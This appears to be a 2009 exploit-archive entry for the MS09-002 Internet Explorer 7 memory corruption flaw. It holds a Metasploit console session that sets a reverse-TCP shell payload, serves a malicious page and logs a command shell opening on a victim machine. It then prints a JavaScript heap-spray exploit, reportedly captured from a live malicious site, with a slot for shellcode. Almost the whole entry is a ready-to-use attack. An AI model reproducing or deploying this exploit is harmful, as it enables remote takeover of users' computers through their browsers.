msf > use exploit/windows/browser/ms09_002msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcpPAYLOAD => windows/shell_reverse_tcpmsf exploit(ms09_002) > set LPORT 1701LPORT => 1701msf exploit(ms09_002) > set LHOST 10.10.10.15LHOST => 10.10.10.15msf exploit(ms09_002) > set URIPATH ie7.htmlURIPATH => ie7.htmlmsf exploit(ms09_002) > set SRVPORT 80SRVPORT => 80msf exploit(ms09_002) > exploit[*] Exploit running as background job.msf exploit(ms09_002) >[*] Handler binding to LHOST 10.10.10.15[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:80/ie7.html[*] Local IP: http://10.10.10.15:80/ie7.html[*] Server started.[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)

<!--MS09-002===============================grabbed from:wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"took a little but found it. /str0ke--><script language="JavaScript">var c="putyourshizhere-unescaped";var array = new Array(); var ls = 0x100000-(c.length*2+0x01020); var b = unescape("%u0C0C%u0C0C"); while(b.length<ls/2) { b+=b;} var lh = b.substring(0,ls/2); delete b; for(i=0; i<0xC0; i++) { 	array[i] = lh + c;} CollectGarbage();var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");var a1 = new Array();for(var x=0;x<1000;x++) a1.push(document.createElement("img"));function ok() { 	o1=document.createElement("tbody"); 	o1.click; 	var o2 = o1.cloneNode();		o1.clearAttributes(); 	o1=null; CollectGarbage(); 	for(var x=0;x<a1.length;x++) a1[x].src=s1; 	o2.click;}</script><script>window.setTimeout("ok();",800);</script># milw0rm.com [2009-02-18]